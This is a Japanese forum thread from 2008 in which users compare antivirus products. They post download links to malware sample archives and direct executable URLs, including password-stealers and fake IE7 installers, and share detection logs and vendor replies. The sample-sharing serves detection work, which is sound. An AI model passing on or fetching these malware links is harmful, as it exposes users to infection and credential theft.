キングとかもいるVirSCANならともかく
いきなりVTデビューはきっついな…

99 :名無しさん@お腹いっぱい。:2008/08/02(土) 00:20:13
せいぜいもらえるのは統計情報ていど

100 :名無しさん@お腹いっぱい。:2008/08/02(土) 11:50:28
>>96
PCTools、Hauriを見てると今後期待できると思えないけどな。
ま、こいつらもつい最近参戦したばかりだが。

>>97
TrendMicroも意外と優秀だったしな。
だけどAV-Testの最新結果でバスターはK7より悪い結果だったという不思議。
そうなるとVirusTotalでK7は健闘するはずだけど・・・

101 :名無しさん@お腹いっぱい。:2008/08/02(土) 12:34:56
>>84
av2009.exeはSymantecとTrendMicro対応。
このスレのちょっと前にNortonは対応が少し速くなった?とのレスがあったけど案外そうかもしれない。

しかしNOD32の対応の遅さは変わらず。

102 : ◆W32/Vael.o :2008/08/02(土) 14:26:55
ttp://www.tane.sakuratan.com/upload/upload.cgi?mode=dl&file=52
Malware-Pack37

103 :名無しさん@お腹いっぱい。:2008/08/02(土) 15:21:34
>>102
NIS2008で5/12 (1、5、7、8、a)
未検出は贈っておきました

104 :名無しさん@お腹いっぱい。:2008/08/02(土) 16:35:02
Rising Antivirus 20.55.50
>>102
8\torpedo.scr: Trojan.Win32.Xcomp.a

105 :名無しさん@お腹いっぱい。:2008/08/02(土) 17:09:16
>>102

kaspersky AV7.0
3/12

トロイの木馬 Trojan-Downloader.Win32.Delf.k tutane0052.zip/Malware/4/i.exe
リスクウェア not-a-virus:FraudTool.Win32.SecureExpertCleaner.a tane0052.zip/Malware/5/CleanerInstaller.exe//PE_Patch.UPX//UPX
トロイの木馬 Trojan-Downloader.Win32.Banload.rsr tane0052.zip/Malware/8/torpedo.scr//XComp

106 :名無しさん@お腹いっぱい。:2008/08/02(土) 17:22:30
>102
K7 Total Security 9.0
3/12

Malware\4,i.exe,Infected by Trojan-Downloader.Win32.Delf.ktu,Cleaned ,
Malware\8,torpedo.scr,Infected By Trojan-Downloader.Win32.Banload.rsr ,Cleaned ,
Malware\9,kil.exe,Infected by Backdoor.Win32.SDBOT.GAV,Cleaned ,

107 :名無しさん@お腹いっぱい。:2008/08/02(土) 17:44:00
K7とKAVが同率でワロス

108 :名無しさん@お腹いっぱい。:2008/08/02(土) 17:45:29
>102
NOD32 3318 (20080801)
4つだけど全部ヒューリスティック

0\kil.exe - Win32/Packed.Themidaの亜種である可能性 アプリケーション
8\torpedo.scr - 新種・未知のNewHeur_PEである可能性 ウイルス
9\kil.exe - Win32/Packed.Themidaの亜種 アプリケーション
a\fotos.exe - 新種・未知のNewHeur_PEである可能性 ウイルス

例外
6\Nero-6.6.0.16.exe > RAR > Common Files\DSFilters\NeAudio.ax - アーカイブが破損しています

109 :名無しさん@お腹いっぱい。:2008/08/02(土) 17:47:06
>>102
F-Secure Internet Security2008

ファイル C:\Documents and Settings\デスクトップ\Malware\4\i.exe に不正なコードを検知しました。
感染: Trojan-Downloader.Win32.Delf.ktu
処理: ファイルを削除しました。
ファイル C:\Documents and Settings\デスクトップ\Malware\8\torpedo.scr に不正なコードを検知しました。
感染: Trojan-Downloader.Win32.Banload.rsr
処理: ファイルを削除しました。
ファイル C:\Documents and Settings\デスクトップ\Malware\9\kil.exe に不正なコードを検知しました。
感染: Trojan:W32/Delf.DOL
処理: ファイルを削除しました。

5もリスクウェアとして検知・・・削除できた

110 :名無しさん@お腹いっぱい。:2008/08/02(土) 21:08:19
セキュリティ初心者質問すれより、各自ベンダーへの提出よろしく
270 名前:267[sage] 投稿日:2008/08/02(土) 20:59:42
フリーのようなので、どちらかを入れることにします。
そのスレの住人に、パソコン再起動して、起動したらセーフ 起動しなかったらアウトと言われました。
とりあえず再起動してきます。
アドレスを一応載せますが、自己責任でお願いします。
read me のとおりの手順で起動して行き、d3なんちゃらというファイルを起動したところで表示されました。
危険なので、ダウンロードされる際は自己責任という形でお願いします。。。
ttp://www3.uploader.jp/home/blackrx/ これのNo27です。
問題のスレがこちら。
http://game13.2ch.net/test/read.cgi/mmosaloon/1214747996/601-700

現在対応してるAV
AntiVir:DR/BAT.Shutdown.AB.2
AVG:KillFiles.EU
Bit:MemScan:Trojan.Agent.AIXL
DrWeb:MULDROP.Trojan
イカ:Trojan.Win32.KillAV.ko
パンダ:Trj/Dropper.WF
VBA:Trojan.Win32.KillAV.ko

111 :名無しさん@お腹いっぱい。:2008/08/02(土) 21:39:02
ttp://i37.tinypic.com/2r59ht1.jpg

112 :名無しさん@お腹いっぱい。:2008/08/02(土) 21:57:26
このスレ的に検出性能と検体対応速度が絶望的なのはマカフィーとNOD32で決定みたいだな。
バスターはそこそこだしNortonとavast!は以前より良くなった、BitDefenderは一時期不調だったけど最近は復調傾向。

とりあえず↓のベンダーで2〜3以上のベンダーが検出すればウイルスで間違いないかと。

AntiVir
avast!
AVG
BitDefender
F-Secure
Kaspersky
Symantec
Trend Micro

113 :名無しさん@お腹いっぱい。:2008/08/02(土) 22:07:14
>>112
あますぎる

114 :名無しさん@お腹いっぱい。:2008/08/03(日) 00:13:42
>>110
カスペ Trojan.Win32.KillWin.cw

115 :名無しさん@お腹いっぱい。:2008/08/03(日) 02:11:41
>>102
トレンド フレックス セキュリティ : オンラインスキャン
Mal_Banker Virus 0\kil.exe
TROJ_FRAUDLOA.TT Trojan 3\virusremover.dll
WORM_SDBOT.GAV Trojan 9\kil.exe

116 :名無しさん@お腹いっぱい。:2008/08/03(日) 11:11:13
最近のまとめ
注)投稿日時が遅いほうが有利なので参考データ

投稿日時 検出数 アンチウイルス

>>82 (29個) [31(木) 14:40:56]
[31(木) 21:21:47] 17 kaspersky AV7.0(3:56:36)
[31(木) 22:01:27] 05 Rising Antivirus 20.55.32
[31(木) 23:00:25] 24 kaspersky 2009 (21:07:00)
[31(木) 23:56:52] 06 K7 Total Security 9.0
[01(金) 14:41:09]  09 McAfee
[01(金) 16:41:37] 12 ウイルスバスター2008

>>84 (2個) [31(木) 21:30:04]
[31(木) 22:01:27] 0 Rising Antivirus 20.55.32
[31(木) 23:00:25] 0 カスペ2009 (21:07:00)
[31(木) 23:56:52] 0 K7 Total Security 9.0
[01(金) 14:41:09]  1 McAfee
[01(金) 16:41:37] 0 ウイルスバスター2008

>>102 (12個) [02(土) 14:26:55]
[02(土) 15:21:34] 4 NIS2008
[02(土) 16:35:02] 1 Rising Antivirus 20.55.50
[02(土) 17:09:16] 3 kaspersky AV7.0
[02(土) 17:22:30] 3 K7 Total Security 9.0
[02(土) 17:45:29] 4 NOD32 3318 (20080801)
[02(土) 17:47:06] 4 F-Secure Internet Security2008
[03(日) 02:11:41] 3 ウイルスバスター

117 :訂正:2008/08/03(日) 11:47:39
>>102 (12個) [02(土) 14:26:55]
[02(土) 15:21:34] 5 NIS2008
[02(土) 16:35:02] 1 Rising Antivirus 20.55.50
[02(土) 17:09:16] 3 kaspersky AV7.0
[02(土) 17:22:30] 3 K7 Total Security 9.0
[02(土) 17:45:29] 4 NOD32 3318 (20080801)
[02(土) 17:47:06] 4 F-Secure Internet Security2008
[03(日) 02:11:41] 3 ウイルスバスター

118 :名無しさん@お腹いっぱい。:2008/08/03(日) 17:49:52
ウイルスバスターは土日のパターン更新ないけど

119 :名無しさん@お腹いっぱい。:2008/08/03(日) 22:07:37
http://virus-factory.tv/dangerous-virus/danger-rankSSS/pc-destroyer.exe

120 :87:2008/08/04(月) 00:38:10
カスペからの返事 >>82>>84

Hello,

1.htmk - Trojan-Downloader.JS.Agent.cke,
asc3550p.sys - Trojan.Win32.Pakes.jyz

New malicious software was found in these files. Detection will be included in the next update. Thank you for your help.(新種ファイル発見)

av2009.exek - Trojan-Downloader.Win32.FraudLoad.vatr,
back.exe.exek - Email-Worm.Win32.Zhelatin.afy,
XPAinstall_88.exek - Trojan-Downloader.Win32.FraudLoad.vatt

These files are already detected. Please update your antivirus bases.(これらのファイルは検知済み)

AV2009Install_77013605[1].exek

This file is corrupted.(ファイル破損)

dflgh8jkd2q8.exek,
vx.tll

No malicious code were found in these files.(有害なコードなし)

Please quote all when answering.

--
Best regards, Vladimir Krylov

121 :名無しさん@お腹いっぱい。:2008/08/04(月) 00:59:37
>>102

カスペ2009
6/12(0,4,5,8,9,a)((うち1ヒューリスティック:a)

Detected Trojan program Trojan.Win32.Delf.dwn 0/kil.exe
Detected Trojan program Trojan-Downloader.Win32.Delf.ktu 4/i.exe
Detected Trojan program Trojan-Downloader.Win32.Banload.rsr 8/torpedo.scr
Detected Trojan program Trojan.Win32.Delf.dwm 9/kil.exe
Detected Trojan program Heur.Downloader a/fotos.exe
Detected riskware not-a-virus:FraudTool.Win32.SecureExpertCleaner.a 5/CleanerInstaller.exe

先ほど7件提出。

カスペからの返事。
2件(1,a)検出(うち1種a:ヒューリからシグネチャに)。2件無害(7,b)。3件回答待ち(2,3,6)。現在、7/12(0,1,4,5,8,9,a)

fotos.exe_ => Trojan-Downloader.Win32.Delf.ljt (Andrey Ladikov)
setup_100527_3_.exe_ => New malicious software was found in the attached file.(新種。検体名不明)(Andrey Bezborodov,)
IPHACTION.dll_ => No malicious software. (Vladimir Krylov)
FixMessenger_www.MsnTrucAstuce.fr => No malicious software . (Vladimir Krylov)

122 :名無しさん@お腹いっぱい。:2008/08/04(月) 09:14:11
セキュリティ初心者質問スレッドpart111
http://pc11.2ch.net/test/read.cgi/sec/1216554958/340

340 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2008/08/04(月) 00:38:27
ttp://www.youturebe.com/bbs/lineage/view/B000000G58.zip
このネトゲパス抜きツールに感染してしまったのですがスパイボットやノートンで検出されません、助けてください

AVG検出

123 :名無しさん@お腹いっぱい。:2008/08/04(月) 10:34:49
>>122
DLしたものをそのままVTスキャン
http://www.virustotal.com/analisis/a60a6de20cf5bc538407c16f9e95c53a

124 :名無しさん@お腹いっぱい。:2008/08/05(火) 15:44:23
KernaeghDrv.dll
これキボンヌ

125 :名無しさん@お腹いっぱい。:2008/08/07(木) 00:56:15
どうも、前スレの935です。
さっきスキャンしたら何故か駆除していた筈なのに復活していた。
被害症状?はIEで時々中国のHPが勝手に表示される タブブラウザでは何もなし

前スレの935の時の検出結果
ttp://www.virustotal.com/jp/analisis/e8d9e7169e5c92aa7bf2d71141bce5b4
今日の検出結果
ttp://www.virustotal.com/jp/analisis/07f86cca30ea2747b6f5d24e90c2648f

シテンマック、マカフィー等はまだ対応していないぽいので、検体upしとく
ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=53
fukuda


126 :名無しさん@お腹いっぱい。:2008/08/07(木) 00:59:53
>>125訂正

今日の検出結果
ttp://www.virustotal.com/jp/analisis/708c34e1caaa4ac6b78ed4e675491857

127 :名無しさん@お腹いっぱい。:2008/08/07(木) 01:04:30
>>126
NortonとMcAfeeとバスターに送った。

128 :名無しさん@お腹いっぱい。:2008/08/07(木) 01:47:01
http://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=54
パス:infected

129 :名無しさん@お腹いっぱい。:2008/08/07(木) 02:00:16
>>128
AVG全部撃墜!

130 :名無しさん@お腹いっぱい。:2008/08/07(木) 02:04:22
>>125>>128
Risingスルー、送りました

VirSCAN.orgの結果>>125
ttp://www.virscan.org/report/faa86695d2a0b611ede2ba84ed3e2504.html

131 :名無しさん@お腹いっぱい。:2008/08/07(木) 02:13:18
>>128
Avira AntiVir Freeも全部撃墜。
BitDefender Freeは全部スルー。

132 :名無しさん@お腹いっぱい。:2008/08/07(木) 09:32:50
>>128
McAfee 10個検出

133 :名無しさん@お腹いっぱい。:2008/08/07(木) 12:56:13
>>128
ウイルスバスター2008
TROJ_AGENT.AQAX -> AdultChannel[2].exe
TROJ_HACHILEM.AP -> app.exe
TROJ_HACHILEM.AZ -> EroAnimePlayer.exe
TROJ_HACHILEM.BA -> LoveLips.exe
TROJ_DLOAD.CH -> HyperErectCollection.exe,MovieTubes.exe
TSPY_VB.GBF -> SexyRoots.exe
TSPY_VB.GHU -> MoviesServiceProvider[2].exe
TSPY_VB.HPH -> EroAnimePlayer[2].exe
TROJ_VB.IIZ -> MoviesServiceProvider.exe

他は検体提出しておきます。
HACHILEMとかまだあるんだなー。ワンクリウェア全盛期はよく見かけたけど。

134 :名無しさん@お腹いっぱい。:2008/08/07(木) 13:05:40
>>128
avast!も全部検出

135 :名無しさん@お腹いっぱい。:2008/08/07(木) 18:35:48
>>128
F-Secureも全部撃墜

136 :130:2008/08/07(木) 19:53:47
>>128
Risingより
   1.文件名:EroAnimePlayer[2].exe
   病毒名:Trojan.Win32.VB.ful
   2.文件名:HyperErectCollection.exe
   :)病毒名:Trojan.Win32.VB.fuk
   3.文件名:HyperErectCollection[2].exe
   病毒名:Trojan.Win32.VB.fuk
   4.文件名:LoveLips.exe
   病毒名:Trojan.Win32.VB.fum

3分割して送ったので他は解析待ち

137 :名無しさん@お腹いっぱい。:2008/08/07(木) 22:01:13
>128
K7 Total Security 9.0
9.5.0513

8/15

138 :名無しさん@お腹いっぱい。:2008/08/07(木) 22:07:35
>>128
カスペ2009

15/15

Detected Trojan program Trojan-PSW.Win32.VB.st one-click/AdultChannel.exe
Detected Trojan program Trojan-PSW.Win32.VB.tk one-click/AdultChannel[2].exe
Detected Trojan program Trojan.Win32.PopUpper.h one-click/app.exe
Detected Trojan program Trojan-PSW.Win32.VB.st one-click/EroAnimePlayer.exe
Detected Trojan program Trojan-PSW.Win32.VB.ta one-click/EroAnimePlayer[2].exe
Detected Trojan program Trojan-PSW.Win32.VB.ss one-click/HyperErectCollection.exe
Detected Trojan program Trojan-PSW.Win32.VB.tv one-click/HyperErectCollection[2].exe
Detected Trojan program Trojan-PSW.Win32.VB.sl one-click/LoveLips.exe
Detected Trojan program Trojan-PSW.Win32.VB.tk one-click/LoveLips[2].exe
Detected Trojan program Trojan-PSW.Win32.VB.sv one-click/MoviesServiceProvider.exe
Detected Trojan program Trojan-PSW.Win32.VB.tg one-click/MoviesServiceProvider[2].exe
Detected Trojan program Trojan-PSW.Win32.VB.sm one-click/MovieTubes.exe
Detected Trojan program Trojan-PSW.Win32.VB.tm one-click/MovieTubes[2].exe
Detected Trojan program Trojan-PSW.Win32.VB.su one-click/SexyRoots.exe
Detected Trojan program Trojan-PSW.Win32.VB.tw one-click/SexyRoots[2].exe

139 :名無しさん@お腹いっぱい。:2008/08/07(木) 22:39:50
NOD32 3336 (20080807)

>>128
6つ

140 :名無しさん@お腹いっぱい。:2008/08/07(木) 22:43:38
もしかしてNOD32はZEROにも劣る?
ウイルスの対応は遅いし。

141 :名無しさん@お腹いっぱい。:2008/08/08(金) 02:32:57
KAV7.0 7.0.1.325
15/15
削除しました: トロイの木馬 Trojan-PSW.Win32.VB.st AdultChannel.exe//UPX
削除しました: トロイの木馬 Trojan.Win32.PopUpper.h app.exe//PE_Patch.UPX//UPX
削除しました: トロイの木馬 Trojan-PSW.Win32.VB.st EroAnimePlayer.exe//UPX
削除しました: トロイの木馬 Trojan-PSW.Win32.VB.tk AdultChannel[2].exe//UPX
削除しました: トロイの木馬 Trojan-PSW.Win32.VB.ta EroAnimePlayer[2].exe//UPX
削除しました: トロイの木馬 Trojan-PSW.Win32.VB.ss HyperErectCollection.exe//UPX
削除しました: トロイの木馬 Trojan-PSW.Win32.VB.tv HyperErectCollection[2].exe
削除しました: トロイの木馬 Trojan-PSW.Win32.VB.tm MovieTubes[2].exe//UPX
削除しました: トロイの木馬 Trojan-PSW.Win32.VB.sl LoveLips.exe//UPX
削除しました: トロイの木馬 Trojan-PSW.Win32.VB.sv MoviesServiceProvider.exe
削除しました: トロイの木馬 Trojan-PSW.Win32.VB.tg MoviesServiceProvider[2].exe//UPX
削除しました: トロイの木馬 Trojan-PSW.Win32.VB.tk LoveLips[2].exe//UPX
削除しました: トロイの木馬 Trojan-PSW.Win32.VB.sm MovieTubes.exe//UPX
削除しました: トロイの木馬 Trojan-PSW.Win32.VB.su SexyRoots.exe//UPX
削除しました: トロイの木馬 Trojan-PSW.Win32.VB.tw SexyRoots[2].exe

142 :名無しさん@お腹いっぱい。:2008/08/08(金) 04:34:07
>>140
何をいまさら

143 :名無しさん@お腹いっぱい。:2008/08/10(日) 20:09:01
NOD32のヒューリスティックはトロイには弱いから個別対応するしかない
しかし定義作成が遅いからなかなか検出されるようにならないし
サポートの鈍さに検体送る人も減ってますます検出力が下がる悪循環

144 :名無しさん@お腹いっぱい。:2008/08/10(日) 21:16:28
>>143
avast!、AVGとは正反対を行ってるな>NOD32

バスターですら検体解析ラボを増やして対応を良くしようとしてるというのに。
Symantecも今年に入ってから検出率や対応速度が良くなった気がするんだけどSymantecに何かあった?

145 :名無しさん@お腹いっぱい。:2008/08/10(日) 21:21:47
解凍パス:virus
http://justic.dip.jp/~lennon/newvirus.zip

Kasperskyでは検知しなかったので報告しておきました。
他のアンチウィルスソフトでは確認していません。
あと、ウィルスのしわざなのか、Kasperskyの更新が出来なくなったので要注意です。

146 :145:2008/08/10(日) 21:24:24
詳細を書いてなかったので追記します。
ウィルスチェックを行ったKasperskyは7.0で定義ファイルは8月10日の午前9時に更新済みでした。

以下Kasperskyからの返信
---------------------------
Hello.
New malicious software was found in the attached file.
It's detection will be included in the next update. Thank you for your help.

Please quote all when answering. Do not forget to include you registration data.

147 :名無しさん@お腹いっぱい。:2008/08/10(日) 21:26:12
>>145
カスペは検出してますよ?
ttp://www.virustotal.com/analisis/e97ab46786982f0a951b61591bc07452

148 :145:2008/08/10(日) 21:29:52
>>147
おお、対応したんですね。報告ありがとうございます。
自分がカスぺに報告したのが12時過ぎだったので、それに対応してくれた見たいです。
他のソフトは対応したか知らないので引き続き注意してください。

149 :名無しさん@お腹いっぱい。:2008/08/11(月) 09:28:57
http://www.betil.hr/images/ie7.0.exe

150 :名無しさん@お腹いっぱい。:2008/08/11(月) 12:12:35
>>149
http://www.virustotal.com/analisis/5439ff24b220e88328d495b09e3f9498

151 :名無しさん@お腹いっぱい。:2008/08/11(月) 12:14:20
K7は期待を裏切りませんな

152 :名無しさん@お腹いっぱい。:2008/08/11(月) 15:11:25
http://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=56
パス:infected

153 :名無しさん@お腹いっぱい。:2008/08/11(月) 15:35:05
>>152
全部VTに投げてみた。
http://www.virustotal.com/analisis/6bbc562b760c20689d8508d56b6d37c6
http://www.virustotal.com/analisis/6bbc562b760c20689d8508d56b6d37c6
http://www.virustotal.com/analisis/bc385b451b5946f41829ce71911cda4d
http://www.virustotal.com/analisis/d82b418652ccd845de6fb908573a0a39
http://www.virustotal.com/analisis/41a67202deccc2cff009abdca21adcfa

全部検出できたのはAVGだけ。
一時期最強だと思われたAntiVirがここ最近どうもよくない気がする(これ以外のマルウェアファイルでもスルーが目立つ)
AntiVirもカスペと同じ道歩んでしまうのか・・・

154 :名無しさん@お腹いっぱい。:2008/08/11(月) 15:38:20
>>153は重複してるのがあった失礼
もう一つが↓これ
http://www.virustotal.com/analisis/c28f47d478ca1e9887835d4a982f74a0

MSも全部検出できてたね。

155 :名無しさん@お腹いっぱい。:2008/08/11(月) 16:10:07
ここ数日でXREAのあちこちに突っ込まれたスクリプトが実行するトロイ
ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=57
virus

156 :名無しさん@お腹いっぱい。:2008/08/11(月) 16:20:22
>>155
http://www.virustotal.com/analisis/bbcd727b7e82c16de62d43193421454b
http://www.virustotal.com/analisis/012d278b0deb0b64f98e3518863aca8f
http://www.virustotal.com/analisis/8e2651443274b5a034e5d6c69e8fefd9
http://www.virustotal.com/analisis/29acffdf95a44c27698083dd34998fde


全部検出:AVG、カスペ、MS
3個検出:Symantec
2個検出:AntiVir、BitDefender、バスター
オールスルー:avast!、McAfee、NOD32

それにしてもNODは酷すぎる。

157 :名無しさん@お腹いっぱい。:2008/08/11(月) 16:27:15
>>152
KAV7
検体送り

158 :名無しさん@お腹いっぱい。:2008/08/11(月) 17:10:25
>>144

> Symantecも今年に入ってから検出率や対応速度が良くなった気がするんだけどSymantecに何かあった?

ノートン使いだけどそんな実感ないなぁ

159 :名無しさん@お腹いっぱい。:2008/08/11(月) 19:16:30


160 :名無しさん@お腹いっぱい。:2008/08/11(月) 19:32:48
>>152
>>155
McAfeeに未検出のを投げた

161 :名無しさん@お腹いっぱい。:2008/08/11(月) 20:16:34
         ___
       / \  /\ キリッ
     / (ー)  (ー)\
    /   ⌒(__人__)⌒ \    <AntiVirもカスペと同じ道歩んでしまうのか
    |      |r┬-|    |
     \     `ー'´   /
    ノ            \
  /´               ヽ
 |    l              \
 ヽ    -一''''''"~~``'ー--、   -一'''''''ー-、.    
  ヽ ____(⌒)(⌒)⌒) )  (⌒_(⌒)⌒)⌒))

162 :名無しさん@お腹いっぱい。:2008/08/11(月) 20:45:57

          ____
        /_ノ  ヽ、_\
 ミ ミ ミ  o゚((●)) ((●))゚o      ミ ミ ミ
/⌒)⌒)⌒. ::::::⌒(__人__)⌒:::\   /⌒)⌒)⌒)
| / / /     |r┬-|    | (⌒)/ / / //   だってお
| :::::::::::(⌒)    | |  |   /  ゝ  :::::::::::/
|     ノ     | |  |   \  /  )  /
ヽ    /     `ー'´      ヽ /    /
 |    |   l||l 从人 l||l      l||l 从人 l||l
 ヽ    -一''''''"~~``'ー--、   -一'''''''ー-、
  ヽ ____(⌒)(⌒)⌒) )  (⌒_(⌒)⌒)⌒))


163 :名無しさん@お腹いっぱい。:2008/08/11(月) 21:29:27
>>152
カスペ2009
5/5

Detected Trojan program Trojan-PSW.Win32.VB.ud one-click/AdultManiac.exe
Detected Trojan program Trojan-PSW.Win32.VB.ui one-click/HyperErectCollection.exe
Detected Trojan program Trojan-PSW.Win32.VB.uj one-click/LoveLips.exe
Detected Trojan program Trojan-PSW.Win32.VB.ul one-click/MovieTubes.exe
Detected Trojan program Trojan-PSW.Win32.VB.uh one-click/SexyRoots.exe

164 :名無しさん@お腹いっぱい。:2008/08/11(月) 21:35:59
AntiVirにしてもNOD32にしても、ヒューリスティックが強みの製品だから
高度なマルウェア作者が回避策を講じてくると、次第に検出率が下がってくる
何しろ作者は放流前に自分でチェックできるから、ある意味勝ち目はない

AntiVirは定義作成も早いから、どんどん検体を提出して補強するしかないな

165 :名無しさん@お腹いっぱい。:2008/08/11(月) 22:00:04
AntiVirはヒューリスティックよりパターン寄りな気がする
(Packerを黒判定し出したので未知の物に強く見えるが)。

166 :名無しさん@お腹いっぱい。:2008/08/11(月) 22:29:12
>>152>>155
Risingに送付完了

167 :名無しさん@お腹いっぱい。:2008/08/11(月) 22:32:33
ヒューリスティック寄りなベンダーはNOD32とPandaぐらいじゃね?
JottiをヲチしてるとNODはヒューリスティックで検出しまくってるのを見る。

168 :名無しさん@お腹いっぱい。:2008/08/11(月) 22:39:29
>>152
KAV7も全部対応した

169 :名無しさん@お腹いっぱい。:2008/08/11(月) 23:21:38
>>167
VBAも結構なイメージ
単なる印象だが

170 :名無しさん@お腹いっぱい。:2008/08/12(火) 02:14:17
>>152
>>155
ウイルスバスター検体提出
検出結果は直後に貼ってあるVTの通り

171 :名無しさん@お腹いっぱい。:2008/08/12(火) 12:36:38
>>167
>>169 に同意。VBA32のパラノイドヒューリスティックは鬼。
ttp://www.virustotal.com/analisis/8f6b7b69e924d05c9928e392ca375121
この水準に達するのはあとDr.WEBくらいしかない。
Mirosoftは今ひとつわからん。

172 :名無しさん@お腹いっぱい。:2008/08/12(火) 13:02:31
XREAトロイ( >>155 )の新型
ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=58
virus

173 :名無しさん@お腹いっぱい。:2008/08/12(火) 14:41:06
>>172>>102
いつもオツカレです


あやうくアプロダのレンタル鯖料金払わずに
止められるところだったよ。

盆休みでちょっと浮かれすぎてたwww

174 :名無しさん@お腹いっぱい。:2008/08/12(火) 15:23:38
おいぃ?

175 :名無しさん@お腹いっぱい。:2008/08/12(火) 16:39:44
クレカ払いにしたからもう安心です^^


176 :名無しさん@お腹いっぱい。:2008/08/12(火) 17:06:23
>>173


>>172
VT
http://www.virustotal.com/analisis/6dd1672acb503b55b4a9ff5765a81085
http://www.virustotal.com/analisis/24d159ef407f789244295f47f7c2ecd9

177 :名無しさん@お腹いっぱい。:2008/08/12(火) 17:55:32
このPacker(アルマジロ?)初めて見た

178 :名無しさん@お腹いっぱい。:2008/08/12(火) 19:07:41
>>172
McAfee投げた

179 :名無しさん@お腹いっぱい。:2008/08/13(水) 00:11:53 ?2BP(0)
Armadilloはスタブがでかいから、一瞬で感染させたいマルウェアには向いてないんかもしれん

180 :名無しさん@お腹いっぱい。:2008/08/13(水) 12:11:21
そしてアルマジロじゃなくなった。

XREAトロイ( >>172 )の新型
ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=59
virus

リネージュ2のパス抜き、3匹目のsysはカーネルモードドライバ。

181 :名無しさん@お腹いっぱい。:2008/08/13(水) 20:38:44
>>180
d

カスペ2009
2/3

Detected Trojan program Trojan-GameThief.Win32.OnLineGames.sqje tane0059.zip/xrea4taa.exe
Detected Trojan program Trojan-GameThief.Win32.OnLineGames.sqgn tane0059.zip/xrea4taa1.dll

3匹目は検体提出しました。

182 :名無しさん@お腹いっぱい。:2008/08/13(水) 22:14:09
>>172>>180
Risingスルー
検体送付済み

183 :181:2008/08/13(水) 23:32:09
カスペからの返事


>>180

This file is corrupted.

184 :名無しさん@お腹いっぱい。:2008/08/14(木) 00:38:15
む、Sophosは引っ掛けてくれたけど、どっか欠けたか。

185 :名無しさん@お腹いっぱい。:2008/08/14(木) 10:56:10
>>180
McAfee投げた

186 :名無しさん@お腹いっぱい。:2008/08/14(木) 14:06:50
http://89.187.49.18/IE-7.0.exe

187 :名無しさん@お腹いっぱい。:2008/08/14(木) 14:38:09
>>125の症状の原因?
ttp://www.virustotal.com/jp/analisis/674f4ebe15f98570e862a851e8a1ad4b

ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=60
sage

188 :名無しさん@お腹いっぱい。:2008/08/14(木) 15:36:15
>>186
BitDefender以外の主要ベンダー全滅

189 :名無しさん@お腹いっぱい。:2008/08/14(木) 17:15:19
>>187
誤検知じゃね?

190 :名無しさん@お腹いっぱい。:2008/08/14(木) 17:43:23
バスターが検出してるってことは
誤検出の可能性大だな

191 :名無しさん@お腹いっぱい。:2008/08/14(木) 19:50:53
>>186
AVG撃墜!

192 :名無しさん@お腹いっぱい。:2008/08/14(木) 19:53:04
>>187
AVG送付済み

193 :名無しさん@お腹いっぱい。:2008/08/14(木) 20:27:15
http://maplesarasi.dip.jp/aa/exe.php?image=http%3A%2F%2Fvirusscan.jotti.org%2Fimages%2Fkaspersky.png&resolution=1&mode=2&color=%23000000&font-size=11&line-height=9&letter-spacing=0&fixed_char=W
ちょっと遊んでみた

194 :名無しさん@お腹いっぱい。:2008/08/14(木) 22:43:10
>>186
http://www.virustotal.com/analisis/4e20229cce1078457c9540c6fe359966
大分対応が進んだね

195 :名無しさん@お腹いっぱい。:2008/08/15(金) 09:57:49
http://webtron.org/up/img/243.zip

196 :名無しさん@お腹いっぱい。:2008/08/15(金) 10:49:07
>>194
いま拾ってみたらMD5が違う、差し替えられたのか?
187bb0d1836e63f48ef97eb03a018126


197 :名無しさん@お腹いっぱい。:2008/08/15(金) 12:34:55
XREAトロイ( >>180 )の新型とおまけ。
ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=61
virus

>>196
IE7スパムとCNN(今はmsnbcか)スパムは更新が激しい(zlobほどじゃないけど)。

198 :名無しさん@お腹いっぱい。:2008/08/15(金) 13:31:16
>>197
McAfee 3つ検出

ついでに4のsys以外はこれまでの全部対応済

199 :182:2008/08/15(金) 18:59:25
Risingより
>>172>>180
   1.文件名:xrea3drop.exe
   病毒名:Trojan.PSW.Win32.GameOL.phu
   2.文件名:xrea3troj.exe
   病毒名:Trojan.PSW.Win32.GameOL.phu
   3.文件名:xrea4taa.exe
   病毒名:Trojan.PSW.Win32.GameOL.pim
   4.文件名:xrea4taa1.dll
   病毒名:Trojan.PSW.Win32.GameOL.pim
   5.文件名:xrea4taa2.sys
   不是病毒

Rising Antivirus 20.57.42
>>197
fsg1.exe>>fsg2.0: Trojan.DL.Win32.Small.vry
troj.exe: Trojan.Win32.Undef.kmz
upk1.exe>>upack0.39: Trojan.DL.Win32.Undef.abe
upk2.exe>>upack0.39: Trojan.Win32.Undef.kff

>>155 (いつ対応したか不明)
xrea2drop.exe: Trojan.PSW.Win32.GameOL.pgu
xrea2troj.exe: Trojan.PSW.Win32.GameOL.pgv

200 :名無しさん@お腹いっぱい。:2008/08/15(金) 22:44:23
d
>>197
カスペ2009 @17:22:00
6/6


Detected Trojan program Backdoor.Win32.Small.dmz fsg1.exe
Detected Trojan program Trojan.Win32.Obfuscated.uya troj.exe
Detected Trojan program Trojan-Downloader.Win32.Agent.aauc upk1.exe
Detected Trojan program Trojan-Downloader.Win32.Small.zie upk2.exe
Detected Trojan program Trojan-GameThief.Win32.OnLineGames.srcs xrea5taa.exe
Detected Trojan program Trojan-GameThief.Win32.OnLineGames.sreq xrea5taa1.exe

>>186はスルーしたので、検体提出。

201 :200:2008/08/15(金) 23:07:55
検出していました。orz

>>186
IE-7.0.exe
Detected Trojan program Backdoor.Win32.Frauder.i

202 :名無しさん@お腹いっぱい。:2008/08/16(土) 00:03:59
>>201
788056EE1FC33F9F407142C8D8C1320Bは当初未対応だった、やっぱカスペは速いね

203 :名無しさん@お腹いっぱい。:2008/08/16(土) 00:42:39
>>186を昨日の時点でDLしたもの↓

ttp://www.virustotal.com/analisis/c6c8dd998c9fd2253b9903938c319db1

確実にSymantecの対応は速くなってる。

204 :名無しさん@お腹いっぱい。:2008/08/16(土) 02:09:30
23/26検出の状況で対応が速くなってると言ってもね
普通じゃね

205 :名無しさん@お腹いっぱい。:2008/08/16(土) 02:33:48
